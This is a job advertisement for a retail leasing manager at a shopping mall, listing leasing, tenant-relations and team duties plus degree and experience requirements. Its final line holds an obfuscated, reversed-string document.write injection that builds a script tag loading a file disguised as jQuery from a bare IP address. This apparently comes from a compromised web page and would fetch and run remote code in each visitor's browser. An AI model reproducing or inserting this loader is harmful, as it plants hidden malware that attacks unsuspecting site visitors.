Industry : Property Development
– Responsible to oversee the overall leasing process of a specific shopping mall(s) from identifying prospective retailers or tenants, negotiating and securing the deal/tenancy; close new retail lease transactions.
– Lease vacant retail space according to leasing plan / schedule in accordance with the relevant time frames set-out therein and according to defined retailer mix and target.
– Conduct presentations and site visits for prospective tenants in order to promote the shopping mall(s) as a unique retail destination. Effectively articulate the features and benefits of the properties to potential merchants, brokerage firms and financial lenders through presentations, meetings and tours of the property.
– Assist to negotiate the deal structure and retail leases and prepare proposals for new and renewing tenants.
– Manage all leasing activities including attracting new tenants, vetting prospective clients, rental negotiations and the development of attractive leasing packages.
– Assist to develop marketing materials to re-lease existing space, and promotional materials for new developments in conjunction with architectural/graphic design firms, writing consultants and exclusive brokers on projects.
– Interface with property managers on tenant relations, building management and tenant coordination related issues and acquisition of new tenants building up and maintaining good relations with current and potential tenants and lease agents.
– Meet the tenants to hear their issues, ideas and arrange a solution to their problems.
– Develop networks and maintain strong, active relationships with the shopping mall, retail, and brokerage community.
– Arrange for specialty leasing in the shopping mall(s), temporary lease in the common areas.
– Perform and ascertain market intelligence in order to gain information that would lead to maximizing the mix and quality of the tenant representation within the project.
– Assist in preparing and adherence of annual Budget for Leasing; property level business / marketing plan.
– Work with architects on design and construction of tenant spaces.
– Contribute to the team through inputs at various workshops related to leasing strategy, merchandising mix, tenant adjacency, precinct, tenant layering, and tenant bundling as well as issues associated with related design impacts.
– Follow-up with clients for documentation related to the projects.
– Continually monitor tenant mix to ensure commercially profitable to the Mall.
– Co-ordinate with other relevant departments regarding changes in design and implications on retail outlets.
– Work with the tenant coordination team in transitioning from executed contracts through to the handover of tenant spaces and commencement of fit out, through to trading.
– Manage the Retail Leasing team on leasing transactions, follow-up on transactions and support the team in concluding deals.
– Interact with team on a daily basis through formal catch-up sessions to maintain the momentum of the leasing process.
– Perform other duties as assigned.
– At least a Bachelor’s degree in Business Administration, Marketing or Communication.
– Experience (about 5 years) in the field of shopping mall leasing management is necessary for this position.
– Well versed in communicating with potential tenants to identify their requirements and convince them to rent a space.
– Able to exercise appropriate customer care attitude and decorum when conducting leasing operations.
– Have skills in effectively organizing the operations of a leasing department to maximize profit and work efficiency. document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))